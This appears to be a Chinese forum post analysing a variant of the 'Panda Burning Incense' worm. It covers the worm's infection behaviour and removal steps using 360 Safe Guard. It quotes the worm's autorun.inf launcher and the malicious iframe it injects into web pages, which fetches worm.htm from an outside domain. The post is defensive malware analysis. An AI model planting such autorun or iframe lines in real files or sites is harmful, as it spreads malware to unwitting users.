爱华网由于当时兴奋不已,帖子内容过于简单,只写了病毒查杀方法。所以本次再次实验病毒,不但写了病毒解决方案,而且病毒运行过程以及病毒行为,部分病毒组件的作用……等等。为了不让两个帖子显得重复,外加其变种“金猪报喜”病毒的解决方案,在这也特此感谢网友——☆缘缘☆,从《雨林木风交流论坛》带来了“金猪喜”病毒样本;好了,废话少说,现在我的电脑文件已经变成一个个“熊猫侠客”了,杀熊猫去喽。。
“熊猫烧香”病毒样本(变种2):GameSetup.exe
湖北李俊在2006年底编写的那个最初的“熊猫烧香”病毒程序我没找到,时间太久了,估计早被新变种淘汰了。电脑用户感染“熊猫烧香”病毒变种最多的应该是变种2,就是本次我玩的这个变种。变种2查杀方法应该和变种1差不多。后来还有个什么变种3、变种4....变种3好像不感染.EXE,但终止系统常用工具的进程;变种4感染.EXE等类型文件,但感染后的文件图标可能是多种多样的。个人认为这两个变种不应该属于“熊猫烧香”病毒,因为“熊猫烧香”病毒就是使大部分二进制文件变成“国宝手烧三根香”的样子,这就是该病毒的主要特点。而后两个变种不符合这一特点,只能说是威金蠕虫类的病毒。还是原版的玩的经典。
《“熊猫烧香”病毒行为》
·鼠标双击执行程序“GameSetup.exe”运行“熊猫烧香”病毒:
由于《360安全卫士-实时保护》的拦截,造成病毒进程运行失败。
◆设置打开读取磁盘自动运行病毒的功能:
“熊猫烧香”病毒运行后,首先会在每个磁盘分区目录下创建“autorun.inf”和“setup.exe”这两个文件。
目的就是当用户打开某个磁盘分区之后这个分区就会重新被感染!因为“autorun.inf”文件作用于实现打开一个磁盘后自动运行某个程序。这个文件本来是计算机中比较常见的文件之一,但是一些U盘、威金等蠕虫病毒却利用它来达到感染、传播的目的。
“autorun.inf”和“setup.exe”这两个文件的文件是“只读”、“隐藏”、“系统”的属性。得需要在控制面板的文件夹选项中关闭“隐藏受保护的操作系统文件”的功能和开启“显示所有文件和文件夹”的功能才能看到它们。不过“熊猫烧香”病毒会从注册表中设置中禁用“显示所有文件和文件夹”的功能,我们后面再来说对于这一症状的解决方法。
打开“autorun.inf”(只是个数据信息文件,其实和文本文档一样,它本身不是病毒程序。。再说了也已经中毒了)配置文件,我们可以看到“autorun.inf”内部信息:
“[AutoRun]
OPEN=setup.exe
shellexecute=setup.exe
shellAutocommand=setup.exe”
解析:
“[AutoRun]”意思是“自动运行”;
“OPEN=setup.exe”意思是执行“setup.exe”这个程序的内核结构,就是运行其程序主要功能;
“shellexecute=setup.exe”意思是执行“setup.exe”这个程序的外壳文件,就是加载该程序的可视化界面。不过病毒制作者隐藏了该程序的外观图形界面;
“shellAutocommand=setup.exe”意思是一段指令,翻译过来是“壳自动的命令=××”。全意是“自动加载运行‘setup.exe’这个程序.”。
所以就能断定,当用户打开某个磁盘后通过“autorun.inf”的信息指令来运行病毒程序“setup.exe”。“setup.exe”这个程序运行后,首先查找有没有“熊猫烧香”病毒的主程序“spo0lsv.exe”,有就调用,没有就重新创建。被调用后,不管进程中有没有“spo0lsv.exe”这个进程都会重新列入一个“spo0lsv.exe”进程!
◆感染Ghost类型操作系统备份的硬件驱动程序:
到这一步时,该病毒还会检查C盘目录下是否存在文件夹名为“Driver”这个文件夹,如果存在就对这个目录下可感染程序进行感染。如果你安装操作系统时使用Ghost速装版的系统,“Driver”文件夹下存放的是此类系统备份的硬件驱动程序,也就是病毒会感染各个驱动还原需要的备份文件。
◆创建病毒主程序并加入进程列表运行:
之后在“%SystemRoot%System32Drivers”文件夹目录下创建文件名为“spo0lsv.exe”的执行文件,之后便加入进程列表运行。很明显,该病毒在伪装打印机的服务进程“spoolsv.exe”这个程序。
◆创建开机自动启动项:
成功写入病毒程序后,便在注册表内创建开机自动启动项。
这是开启《360安全卫士-实时保护》监测到“熊猫烧香”病毒添加开机自动启动项后的拦截提示:
◆破坏“Windows安全中心”:
“熊猫烧香”病毒相关程序和注册表项完全创建后,通过注册表破坏“Windows安全中心”服务。这个病毒竟然直接把“Windows安全中心”的服务“SecurityCenter”删掉了。这时用户是无法在服务列表里面看到“SecurityCenter”这一项了,从而导致“Windows安全中心”的监控功能无法启用!
这是启用“SecurityCenter”服务时“安全中心”的界面:
这是关闭“SecurityCenter”服务时“安全中心”的界面:
如果长期关闭“SecurityCenter”服务的朋友电脑中了“熊猫烧香”或者“橙色八月”这样的病毒可能会察觉不到这一破坏性。
◆感染二进制执行程序和脚本类文件:
病毒对系统破坏成功后,迅速全盘搜索感染.exe、.scr、.pif、.com类型的二进制文件,被感染的类型文件会变成“国宝手烧三根香”的样子。
这是“熊猫烧香”病毒感染《搜狗》拼音输入法后的截图:
而且还感染.htm、.html、.asp、.php、.jsp、.aspx这些脚本类型的文件,这些文件被感染后图标不改变,而是脚本文件内容结尾处都加上如下这段html代码:
<iframe src=http://www.krvkr.com/worm.htmwidth=height=0></iframe>
不过可以通过InternetExplorer属性设置“受限制的站点”阻止IE浏览器去访问病毒地址去下载病毒信息。
也可以通过“hosts”文件来屏蔽病毒的网址链接,首先得找到hosts文件。路径:%SystemRoot%system32driversetc目录下找到hosts文件,鼠标右键该文件菜单中选择“用记事本打开”,在“127.0.0.1”后面添加病毒下载网站的域名“www.krvkr.com”,文件(F)——保存(S)。
切记,127.0.0.1”和“www.krvkr.com”之间有个空格才能生效。
◆感染某个文件后在该文件所在目录下创建“Desktop_.ini”文件:
“熊猫烧香”病毒发作后,在感染执行文件或者脚本文件的同时,会在这些文件所在的目录下创建一个名称为“Desktop_.ini”的配置文件。
有人说这个文件对病毒没有任何意义,它只记录了该目录下文件被感染的日期。打开这个文件的信息内容:
其实这个文件对病毒来说还是有用的,它就相当于一个“验证”。“熊猫烧香”的主程序“spo0lsv.exe”运行后,在感染文件之前,首先检查该目录下是否存在“Desktop_.ini”这个文件。如果不存在,就会感染这个目录下的文件,同时也创建“Desktop_.ini”这个配置文件。如果这个目录下存在“Desktop_.ini”这个文件,那么病毒程序就直接跳过这个文件目录去感染下一个目标了。
我试着删除了《WinRAR》压缩软件,该目录下只留下了“Desktop_.ini”这个文件,之后又重新安装了一遍《WinRAR》压缩软件,未被感染。当我删去“Desktop_.ini”文件后没几秒钟就重新被感染了!
声称:我是在“spo0lsv.exe”病毒程序运行时实验的以上步骤。
这个时候有人会问:“那我提前在文件夹目录下创建这个“Desktop_.ini”文件,是不是就可以防止‘熊猫烧香’病毒感染文件了?”这个想法很好,但是病毒制作者也没那么傻,别忘了“Desktop_.ini”里面记录的时间日期。比如今天2010年1月1日你创建了“Desktop_.ini”文件,并且在“Desktop_.ini”文件内写上“2010-1-1”这段信息。只能说病毒在2010年1月1日不会感染这个文件夹目录下的文件,但是过了今天到2010年1月2日,病毒会监测到你系统时间日期与“Desktop_.ini”记录的时间日期不相符,会重新感染这个文件夹目录下的文件,之后更新“Desktop_.ini”里面的时间日期为“2010-1-2”。除非你自己手动更新这段时间日期比病毒更新的速度快(一秒之内的时间,谁能有那么敏捷?),否则过得了初一过不了十五也难逃厄运。再说,不同的“熊猫烧香”变种创建的“验证”文件名称也不一致,比如“_Desktop.ini”、“Desktop_1.ini”、“Desktop_2.ini”……况且这个配置文件也是“只读”、“隐藏”、“系统”的属性,即使在控制面板的文件夹选项中关闭“隐藏受保护的操作系统文件”的功能和开启“显示所有文件和文件夹”的功能,修改它之前也得去掉“只读”的属性才能保存修改..要命啊。
上面关于“Desktop_.ini”文件的更多解说请下载参看录像(在下面的附件中)。
◆该病毒的一些其它行为:
由于图片过大----图片地址链接:
http://pimg.qihoo.com/qhimg/baike/991_4328/17/04/31/170431bq11b62f.ec7861.jpg
维护:截图快照于《百度百科》。
《“熊猫烧香”病毒查杀方法》
注意:一定要按照如下软件杀毒步骤进行杀毒。
病毒拥有能让用户打开InternetExplorer却无法访问网络的功能,但是它自己能够访问网络。以免病毒通过后台从指定的网站网站下载指定的病毒资源信息到你的计算机,所以首先拔掉网线(强制断网)。
试着按“Ctrl+Alt+Del”键调出任务管理器,来结束“熊猫烧香”的病毒进程“spo0lsv.exe”。可是任务管理器只闪出了一下影子就自动关闭了,因为该病毒主进程具有屏蔽任务管理器、注册表编辑器、系统配置实用程序等系统工具的进程。据我观察,“spo0lsv.exe”做完全部工作后,每隔110秒的时间通过后台对这些进程进行一次结束。如果想利用“任务管理器”结束病毒进程,得把握好时间啊。
下图是病毒反复屏蔽“任务管理器”进程,导致启动项那一栏内出现多个任务管理器的图标。
我和病毒较劲。我反复调出“任务管理器”五次,病毒就屏蔽“任务管理器”五次;造成启动项那一栏显示五个“任务管理器”的进程图标。
一、结束“熊猫烧香”病毒进程树:
这次这个“熊猫烧香”病毒的变种没有对360安全卫士的进程“360tray.exe”进行结束的功能,可以利用360来结束“spo0lsv.exe”病毒进程。
打开《360安全卫士》——高级工具,选择“系统进程管理”。(从上往下数第三项)
从中可以看到“熊猫烧香”的进程“spo0lsv.exe”,选择“结束任务”。
二、删除“熊猫烧香”病毒启动项:
结束进程树只是本次结束了病毒进程,但是开机启动项必须删掉,不然治标不治本。
打开《360安全卫士》——高级工具,选择“开机启动项管理”。(从上往下数第一项)
从中可以看到“熊猫烧香”病毒的开机启动项“svcshare”,设置启动方式,选择“禁止启动”。
记得过去的《360安全卫士》是可以对开机启动项做删除处理的,可是自主从《360安全卫士V6.0》之后这个功能就被去掉了,在此BS一下。
过去的《360安全卫士》可以对启动项做删除处理!
虽然现在这个功能被去掉了,咱们还可以用一些其它的软件去删除病毒启动项。首先把病毒的一些程序都杀掉,再用软件去删掉病毒启动项,不然这些软件会重新被感染。能删除启动项的软件比如《超级兔子》、《Windows优化大师》、《SystemRepairEngineer》之类的安全维护软件。
三、删除“熊猫烧香”病毒主程序:
删掉“熊猫烧香”病毒的自动启动项后,就可以删除其病毒的相关程序了,来个斩草除根。
打开《360安全卫士》——杀木马。
选择“全盘扫描”。
图中我勾画蓝色圆圈的是病毒的主要程序,点击“立即处理”隔离/删除病毒程序。
隔离/删除病毒程序之后,病毒的启动项也会被删掉。这也解释了前面所说的那样为什么《360安全卫士V6.0》版本之后去掉了留给用户自己删除启动项的功能,这是因为防止电脑新手误删启动项和为了让用户达到完全使用360软件的目的才这样做的,不过这样也给我们这样的带来了参考方面的不方便。
对于“熊猫烧香”这类型的病毒扫描一次清除未必成功,建议对全部磁盘多次扫描、清除。清除完毕务必重启计算机。
如图,我画红圈圈的地方。可以使用360安全卫士清除木马和修复系统被篡改的设置。
PS:一般中了威金感染的文件不会这么少,因为此次为实验病毒,仅作为参考。
